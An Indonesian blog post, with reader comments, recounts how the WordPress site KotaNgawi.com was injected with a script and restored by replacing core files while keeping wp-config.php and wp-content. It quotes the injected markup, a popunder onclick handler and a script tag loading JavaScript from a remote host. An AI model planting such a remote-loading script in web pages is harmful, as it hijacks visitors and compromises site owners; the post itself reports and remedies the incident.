Script Inject WordPress
Sudah lebih seminggu situs resmi Komunitas Blogger Ngawi, KotaNgawi.com, kena inject script. Awalnya saya tidak curiga karena tampilan dan fitur-fitur masih tetap berjalan normal, sampai kopdar kecil saya, sagung dan zebhi di kalijogo, mereka mengatakan bahwa gaiso login neng Kota Ngawi. Sehingga tidak bisa update berita terbaru.
Ternyata begitu saya coba akses wp-admin ternyata benar, yang muncul hanya white blank screen . Beberapa saat agak tegang juga, ketika saya buka page source muncul script mencurigakan di deretan paling atas, sehingga ketika kotangawi dibuka meload script dibawah ini :
<body onclick="popunder();">
<script type="text/javascript" src="http://pshaos.co.cc/querys.js">
</script></body>Daripada susah ngotak-ngatik goleki penyebabe langsung saya timpa file wordpress yang ada di folder installasi dengan file baru. Tapi tunggu dulu.. jika anda mengalami hal ini jangan timpa file wp-config.php dan folder wp-content, sehingga anda tidak perlu install ulang wordpress anda.
Alhamdulillah setelah saya lakukan semua berjalan normal dan lancar, sehingga KotaNgawi.com sudah bisa diakses dengan mudah tur wes iso update lagi.
keyword pada posting ini adalah: inject WordPress,Posting yang berhubungan
- Jika anda suka artikel ini, silakan share ke teman-teman anda di FACEBOOK. Cukup dengan mengKlik link ini saja.
- Dan jika diinginkan artikel ini boleh dicopy paste, karena blog ini penganut aliran BEBAS COPY PASTE
wa….aku juga pernah mengalami kasus itu, tapi untunglah cara-cara kita sama
*ketimbang mikir jeruh-jeruh, mending ditumpuk seng anyar wae, hahaha*
alhamdulilah… saia pertamaxxx di blog yang keren ini
*terharu*
loh pantes setiap habis komeng ilang, terus semingguan gak apdet
wah, semoga bisa lagi, dan semoga yang berbuat seperti itu masuk neraka
kok ngeri banget
ngintip themes wordpress saya dulu
sapa tau juga kena
juh, gonq tak knokke ugh tetep enek tmbahn script eneh.
Wiz tak instal ulang mlah tanduk neh….
hmmm begitu ya… btw kok bisa muncul script itu dari mana ya? apa jangan jangan lahir dengan sendirinya…. hiii srem..
uh, dadi ngunu ya kang
tiwasan dulu pernah kejadian langsug tak install ulang
sebentar, ikut menyimak sejenak.
tadimalem meluncu ke kotangawi, keknya masih belum sehat seperti dulu
Sampai saiki durung ono sing up date Mass … mosok isih postingan lawas yoo
waduh,….
jujur, saya bingung kalo soal beginian….
ya Alhamdlillah kalo begitu……
admine kudu mantau terus…
alhamdulilah kalau udah ketemu masalahnya trus bisa terus update … dan kota ngawi bisa lancar untuk prosesnya….. kalau blogspot bisa gak kena jail kayak gitu heheheh….
aku durung njajal
wisss di update looohhh
kadang yg parah malah wp-admin di ambil alih, itu smua karna kelemahan security server hosting kita (‘kata pelakunya’), jd spertinya percuma security web/blog kalau server yg ga aman, kejadian di beberapa blog sy yg lain selain blogkublogmu.com yang lg nawarin link balik gratis, he he he, moga ga kejadian n di kerjai cracker, wih cape !
pengalaman berharga.. terima kasih infonya kang
salam,
alhamdulillah…..
Alhamdulillah. . Lah lek kui mungkin enek wong njobo sing menyelundup masuk. . Hati2 ntar kalo ada yg laen, paswod usernem n kawan kawan
sukur deh kalo dah normal lagi
alhamdulillah kalau sekarang dah kembali normal lagi
Memang inject script seperti ini menjengkelkan juga sniff sniff.. Thanks for sharing the solution
Lha yo kuwi. Kita kudu ati2.
Kok bisa2nya cracker nyelonong inject sprit, eh script.
ohh gitu ya pa.. thanks pa info nya. ada ide2 tuh para cracker
Hai salam kenal
infonya mantap.
Btw, bagaimana cara attacker menyisipkan kode itu di dlm script web?
hm… begitu ya mas..
keren bro.
lanjutkan !
hehe
perlu dicaritahu tuh yg jail. biar nanti g ngerjain lagi
wah bagus tuh….semoga aman ah….